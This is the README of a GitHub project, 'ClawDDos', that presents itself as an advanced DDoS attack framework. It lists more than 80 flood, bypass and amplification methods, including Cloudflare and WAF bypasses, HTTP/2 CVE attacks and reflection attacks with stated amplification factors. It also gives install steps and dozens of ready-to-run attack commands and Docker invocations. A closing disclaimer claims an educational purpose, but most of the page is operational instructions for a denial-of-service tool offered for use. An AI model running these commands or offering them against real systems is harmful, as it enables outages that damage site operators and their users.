Skip to content

inject3r/ClawDDoS

Repository files navigation

🦞 ClawDDos - Advanced DDoS Attack Framework

(Programming Language - Python 3.10+)

ClawDDos forks ClawDDos last commit ClawDDos Repo stars ClawDDos License Issues

Python Methods Layer4 Layer7 Docker

⚠️ Please do not attack websites without the owner's consent. ⚠️

⚑ Complete rewrite and improvement of MHDDoS - Faster, More Stable, More Methods ⚑


πŸ“‹ Table of Contents


🌟 About

ClawDDos is an advanced multi-threaded DDoS attack framework with 83+ attack methods and a powerful proxy system. This project is a complete rewrite of MHDDoS, with significant improvements in performance, stability, and features.

Why ClawDDos?

Feature ClawDDos MHDDoS
Attack Methods 83+ 57
Layer 4 Methods 40+ 28
Layer 7 Methods 43+ 29
Proxy Auto-Download βœ… ❌
Proxy Validation βœ… ❌
Save Valid Proxies βœ… ❌
NO-PROXY Mode βœ… ❌
HTTP/2 Attacks βœ… ❌
TLS Attacks βœ… ❌
Interactive Console βœ… βœ…
Docker Support βœ… βœ…
Better Performance βœ… ❌

✨ Features & Methods

πŸ’£ Layer 7 - 43 Methods

Method Description
get GET HTTP GET Flood
post POST HTTP POST Flood
head HEAD HTTP HEAD Flood
bomb BOMB HTTP Bomb Flood (No external dependencies)
bypass BYPASS WAF Bypass Flood
stress STRESS Stress Flood with large payloads
slow SLOW Slowloris Attack
bot BOT Search Engine Bot Simulation
πŸ”ͺ KILLER Killer Flood (Infinite threads)
πŸ§… TOR TOR Network Onion Service Flood
cloudflare CFB Cloudflare Bypass
cloudflare CFBUAM Cloudflare Under Attack Mode Bypass
ddosguard DGB DDoS Guard Bypass
arvancloud AVB Arvan Cloud Bypass
googleshield GSB Google Project Shield Bypass
ovh OVH OVH HTTP Bypass
apache APACHE Apache Range Header Exploit
wordpress XMLRPC WordPress XMLRPC Pingback Flood
pipeline PIPELINE HTTP Pipelining Flood
range RANGE Range Request Flood
lowloris LOWLORIS Advanced Slowloris Variant
zombie ZOMBIE Zombie Connection (Keep-alive without data)
cache CACHEPOISON HTTP Cache Poisoning
chunked CHUNKED Chunked Transfer Bomb
grpc GRPC gRPC Microservice Flood
graphql GRAPHQL GraphQL Introspection Bomb
websocket WSFLOOD WebSocket Connection Flood
rhex RHEX Random HEX Path Flood
stomp STOMP STOMP Protocol Flood
dyn DYN Dynamic SubDomain Flood
downloader DOWNLOADER Slow Download Simulation
null NULL Null UserAgent Flood
cookie COOKIE Random Cookie Flood
pps PPS High PPS HTTP Requests
even EVEN Even Flood with more headers
rapidreset RAPIDRESET HTTP/2 Rapid Reset (CVE-2023-44487)
h2 H2_STREAM_BOMB HTTP/2 Stream Bomb
h2 H2_BOMB HTTP/2 Bomb (HPACK Amplification 2026)
h2 H2_CONTINUATION HTTP/2 CONTINUATION Flood (CVE-2024-27983)
h2 H2_SMUGGLING HTTP/2 Request Smuggling (CVE-2024-27983)
tls TLS_RENEG TLS Renegotiation Flood (2024)
doh DOH_AMP DNS-over-HTTPS Amplification
turn TURN TURN Server Relay Flood

🧨 Layer 4 - 40 Methods

Method Description
tcp TCP TCP Flood
udp UDP UDP Flood
syn SYN SYN Flood (needs root)
icmp ICMP ICMP Flood (needs root)
connection CONNECTION Connection Flood
cps CPS CPS Flood
ovh OVH-UDP OVH UDP Flood
vse VSE Source Engine Query Flood
minecraft MINECRAFT Minecraft Server Ping Flood
mcbot MCBOT Minecraft Bot Attack
fivem FIVEM FiveM Server Getinfo Flood
fivem-token FIVEM-TOKEN FiveM Token Authentication Flood
ts3 TS3 TeamSpeak 3 Server Flood
mcpe MCPE Minecraft PE Server Flood
samp SA_MP SA-MP (San Andreas Multiplayer) Flood
gre GRE Generic Routing Encapsulation Flood
smb SMB Server Message Block Flood
quic QUIC QUIC/HTTP3 Flood
mqtt MQTT MQTT IoT Protocol Flood
ipfrag IP_FRAG IP Fragmentation Flood
vxlan VXLAN Virtual Extensible LAN Tunnel Flood
mpls MPLS Multi-Protocol Label Switching Flood
geneve GENEVE Generic Network Virtualization Encapsulation Flood
l2tp L2TP Layer 2 Tunneling Protocol Flood
quic QUIC_HANDSHAKE QUIC Handshake CPU Exhaustion
ipv6 IPV6_ND IPv6 Neighbor Discovery Flood
vrrp VRRP Virtual Router Redundancy Protocol Flood

πŸ“‘ Amplification - 13 Methods

Method Description Amplification Factor
ntp NTP NTP Monlist Amplification 200-500x
dns DNS DNS Reflection Attack 30-100x
mem MEM Memcached Reflection 100-500x
memcached MEMCACHED Memcached Amplification 100-500x
cldap CLDAP Connectionless LDAP Amplification 50-100x
ssdp SSDP Simple Service Discovery Protocol 30-100x
wsd WSD WS-Discovery Amplification 50-200x
coap COAP Constrained Application Protocol 30-60x
pcp PCP Port Control Protocol 20-30x
stun STUN Session Traversal Utilities for NAT 10-15x
chargen CHAR Character Generator Protocol -
ard ARD Apple Remote Desktop -
rdp RDP Remote Desktop Protocol -

βš™οΈ Tools

Interactive Console Mode

python main.py TOOLS

Available Tools

Tool Description
CFIP Find Real IP Address Of Websites Powered By Cloudflare
PING Response time of icmp request
DSTAT Shows Bytes Received, bytes Sent and their amount
INFO About site like country, ISP, organization
CHECK Check If Websites Status
TSSRV TeamSpeak SRV Resolver
DNS Show DNS Records Of Sites

Console Commands

  • HELP - Show Help Message
  • CLEAR - Clear Console
  • BACK - Back to main console
  • EXIT - Close Console and exit

πŸ“¦ Installation

From Source

git clone https://github.com/inject3r/ClawDDoS.git
cd ClawDDoS
pip install -r requirements.txt
python main.py --help

One-Line Installation (Fresh VPS)

apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential git && git clone https://github.com/inject3r/ClawDDoS.git && cd ClawDDoS && pip3 install -r requirements.txt

Quick Setup

# Create necessary directories
mkdir -p files/proxies files/reflectors

# Download some proxies (optional)
python main.py --help

πŸš€ Usage

Basic Syntax

python main.py <METHOD> <TARGET> [OPTIONS]

Layer 7 Attack (HTTP/HTTPS)

# With proxies
python main.py GET http://target.com 1 100 proxies.txt 10 60
python main.py POST http://target.com 1 100 proxies.txt 10 60
python main.py BOMB http://target.com 1 100 proxies.txt 10 60 debug
python main.py BYPASS http://target.com 1 100 proxies.txt 10 60
python main.py BOT http://target.com 1 100 proxies.txt 10 60
python main.py STRESS http://target.com 1 100 proxies.txt 10 60
python main.py SLOW http://target.com 1 100 proxies.txt 10 60
python main.py PIPELINE http://target.com 1 100 proxies.txt 10 60
python main.py RANGE http://target.com 1 100 proxies.txt 10 60
python main.py CHUNKED http://target.com 1 100 proxies.txt 10 60
python main.py GRPC http://target.com 1 100 proxies.txt 10 60
python main.py GRAPHQL http://target.com 1 100 proxies.txt 10 60
python main.py WSFLOOD http://target.com 1 100 proxies.txt 10 60
python main.py RAPIDRESET http://target.com 1 100 proxies.txt 10 60

# Without proxies
python main.py GET http://target.com 1 100 no-proxy 10 60
python main.py POST http://target.com 1 100 none 10 60

Layer 4 Attack (TCP/UDP)

python main.py UDP 127.0.0.1:9999 100 60
python main.py TCP 127.0.0.1:9999 100 60
sudo python main.py SYN 127.0.0.1:9999 100 60
python main.py ICMP 127.0.0.1 100 60
python main.py VXLAN 127.0.0.1:4789 100 60
python main.py MPLS 127.0.0.1 100 60
python main.py GENEVE 127.0.0.1:6081 100 60
python main.py L2TP 127.0.0.1:1701 100 60
python main.py GRE 127.0.0.1 100 60
python main.py SMB 127.0.0.1:445 100 60
python main.py QUIC 127.0.0.1:443 100 60
python main.py MQTT 127.0.0.1:1883 100 60
python main.py SA_MP 127.0.0.1:7777 100 60

Amplification Attack

python main.py NTP 127.0.0.1:123 100 60 reflectors.txt
python main.py DNS 127.0.0.1:53 100 60 reflectors.txt
python main.py MEM 127.0.0.1:11211 100 60 reflectors.txt
python main.py SSDP 127.0.0.1:1900 100 60 reflectors.txt
python main.py WSD 127.0.0.1:3702 100 60 reflectors.txt
python main.py COAP 127.0.0.1:5683 100 60 reflectors.txt
python main.py PCP 127.0.0.1:5351 100 60 reflectors.txt
python main.py STUN 127.0.0.1:3478 100 60 reflectors.txt

Skip Proxy Check

python main.py GET http://target.com 1 100 proxies.txt 10 60 debug NO-CHECK
python main.py BOMB http://target.com 1 200 proxies.txt 100 3600 debug NO-CHECK

Game Protocol Attacks

# Minecraft
python main.py MINECRAFT 127.0.0.1:25565 100 60
python main.py MCBOT 127.0.0.1:25565 100 60
python main.py MCPE 127.0.0.1:19132 100 60

# FiveM
python main.py FIVEM 127.0.0.1:30120 100 60
python main.py FIVEM-TOKEN 127.0.0.1:30120 100 60

# SA-MP
python main.py SA_MP 127.0.0.1:7777 100 60

# TeamSpeak
python main.py TS3 127.0.0.1:9987 100 60

# Source Engine
python main.py VSE 127.0.0.1:27015 100 60

🐳 Docker

Build Image

docker build -t clawddos .

Run with Docker

# Show help
docker run --rm -it --network host --privileged clawddos --help

# Run UDP attack
docker run --rm -it --network host --privileged clawddos UDP 127.0.0.1:9999 100 60

# Run TOOLS
docker run --rm -it --network host --privileged clawddos TOOLS

# With proxies
docker run --rm -it --network host --privileged \
  -v $(pwd)/files:/app/files \
  clawddos GET http://target.com 1 100 proxies.txt 10 60

# With NO-CHECK
docker run --rm -it --network host --privileged \
  -v $(pwd)/files:/app/files \
  clawddos BOMB http://target.com 1 200 proxies.txt 100 3600 debug NO-CHECK

Docker Compose

docker-compose build
docker-compose run --rm clawddos --help
docker-compose run --rm clawddos TOOLS
docker-compose run --rm --privileged clawddos UDP 127.0.0.1:9999 100 60

πŸ“ Documentation

Parameters

Parameter Description
METHOD Attack method name
TARGET Target IP:PORT or URL (http://example.com)
SOCKS Proxy type (0=ALL, 1=HTTP, 4=SOCKS4, 5=SOCKS5, 6=RANDOM)
THREADS Number of threads (higher = more power)
PROXY File containing proxy list or 'no-proxy'
RPC Requests Per Connection (Layer 7 only)
TIME Attack duration in seconds (0 = infinite)
TIMEOUT Connection timeout in seconds
REFLECTORS File containing reflector IPs (Amplification)
DEBUG Enable debug logging (optional)
NO-CHECK Skip proxy validation (optional)

Examples

# Layer 7 attack with proxies
python main.py BYPASS http://target.com 1 200 proxies.txt 100 3600 debug

# Layer 4 UDP flood
python main.py UDP 192.168.1.100:80 100 60

# Amplification DNS attack with reflectors
python main.py DNS 192.168.1.100:53 50 30 reflectors.txt

# Without proxies
python main.py GET http://target.com 1 100 no-proxy 50 60

# With NO-CHECK (skip proxy validation)
python main.py BOMB http://target.com 1 200 proxies.txt 100 3600 debug NO-CHECK

# Interactive tools
python main.py TOOLS

# Docker with NO-CHECK
docker run --rm -it --network host --privileged \
  -v $(pwd)/files:/app/files \
  clawddos BYPASS http://target.com 1 200 proxies.txt 100 3600 debug NO-CHECK

🀝 Contributing

Contributions are welcome! Please feel free to submit a Pull Request.

  1. Fork the repository
  2. Create your feature branch (git checkout -b feature/amazing-feature)
  3. Commit your changes (git commit -m 'Add some amazing feature')
  4. Push to the branch (git push origin feature/amazing-feature)
  5. Open a Pull Request

πŸ“œ License

This project is licensed under the MIT License - see the LICENSE file for details.


πŸ™ Acknowledgments

  • Inspired by MHDDoS
  • Thanks to all contributors and users

⚠️ Disclaimer & Legal Notice

This tool is developed for educational and security research purposes only.

The developer and all contributors of this project are not responsible for any misuse, illegal activities, or damages caused by this software. By using this tool, you agree that:

  • You will not use this tool for any illegal or malicious purposes.
  • You will only use this tool on systems you own or have explicit permission to test.
  • You understand that unauthorized network attacks are illegal in most jurisdictions and can result in severe legal consequences.
  • The developer and contributors do not condone, encourage, or support any form of cyber attacks, hacking, or unauthorized access.

USE THIS TOOL AT YOUR OWN RISK. THE DEVELOPERS ASSUME NO LIABILITY FOR ANY DAMAGES OR LEGAL ISSUES ARISING FROM ITS USE.


If you are unsure about the legality of using this tool, please consult with a legal professional before proceeding.


🌟 Star History

Star History Chart


Made with ❀️ by inject3r | Telegram: @inject3r

GitHub stars GitHub forks GitHub watchers


⭐ If you like this project, please give it a star! ⭐